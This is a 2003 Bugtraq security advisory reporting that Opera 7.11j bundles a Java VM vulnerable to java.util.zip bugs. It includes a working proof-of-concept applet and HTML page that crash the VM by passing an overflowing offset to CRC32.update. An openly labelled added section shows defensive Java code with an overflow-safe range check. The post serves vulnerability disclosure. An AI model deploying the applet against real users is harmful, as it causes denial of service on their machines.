Message-ID: <Pine.A41.4.44.0305110101220.52558-100000@zivunix.uni-muenster.de>
Date: Sun, 11 May 2003 01:28:59 +0200 (MES)
From: Marc Schoenefeld <schonef@...-muenster.de>
To: bugtraq@...urityfocus.com
Subject: Opera 7.11 java.util.zip.* Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

 The just-released Opera 7.11j comes with a Java VM (1.4.1_01)
 that is vulnerable to the java.util.zip.* bugs
 that can cause denial of service via Java applets
 like the one with source printed below.
 Therefore my suggestion to the Opera deployment
 team is to bundle Java 1.4.1_02, which is not vulnerable
 to the java.util.zip bugs.
 All 1.3.1 versions are still vulnerable!
 If you already installed Java 1.4.1_02 prior to
 installing Opera, you are not vulnerable, because
 the most current JVM seems to be chosen by Opera
 when running applets.
 If you are interested in the details (not Opera-specific),
 read the whole story at www.illegalaccess.org or read:

http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
http://developer.java.sun.com/developer/bugParade/bugs/4811917.html

Sincerely
Marc Schoenefeld


The applet code:
========CRCApplet.java=======================
import java.applet.Applet;
import java.awt.Graphics;

public class CRCApplet extends Applet {
    public void paint(Graphics g) {
        (new java.util.zip.CRC32()).update(new byte[0], Integer.MAX_VALUE-3, 4);
    }
}
=============================================

The corresponding HTML
=======CRCApplet.html======================
<html>
<body>
<applet code=CRCApplet.class width=400 height=400>
</applet>
</body>
</html>
===========================================


- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE+vYs/qCaQvrKNUNQRAqWUAJ9tdtt9uOboP2fq+/ZqhRqE8Fet7gCfffsD
nBk6PscPB5WQYpqgZaItaDw=
=uUS/
-----END PGP SIGNATURE-----
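
An added example, not part of the original post or of any JDK source: a Java-side range check that rejects the (array, offset, length) triple used in the applet above before it reaches CRC32.update. The post does not state the root cause, so this assumes the problem class is missing range validation ahead of the native code; the class and method names are hypothetical.

```java
import java.util.zip.CRC32;

public class SafeCrc32Demo {
    // Naive check (illustrative, not taken from any JDK): off + len wraps past
    // Integer.MAX_VALUE and goes negative, so the comparison wrongly passes.
    static boolean naiveInBounds(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off + len <= b.length;
    }

    // Overflow-safe check: with len >= 0, b.length - len cannot wrap.
    static boolean safeInBounds(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && off <= b.length - len;
    }

    // Hypothetical wrapper: validate in Java before delegating to CRC32.update,
    // so an unpatched runtime never sees an out-of-range request.
    static void checkedUpdate(CRC32 crc, byte[] b, int off, int len) {
        if (b == null) {
            throw new NullPointerException("b");
        }
        if (!safeInBounds(b, off, len)) {
            throw new ArrayIndexOutOfBoundsException(
                "off=" + off + " len=" + len + " length=" + b.length);
        }
        crc.update(b, off, len);
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0];
        int off = Integer.MAX_VALUE - 3;   // arguments from the applet in the post
        int len = 4;
        System.out.println("off + len wraps to: " + (off + len));
        System.out.println("naive check passes: " + naiveInBounds(empty, off, len));
        System.out.println("safe check passes:  " + safeInBounds(empty, off, len));

        CRC32 crc = new CRC32();
        try {
            checkedUpdate(crc, empty, off, len);
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // Constructed sample input: a valid range still goes through.
        byte[] data = "constructed sample".getBytes();
        checkedUpdate(crc, data, 0, data.length);
        System.out.println("crc32 = " + Long.toHexString(crc.getValue()));
    }
}
```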


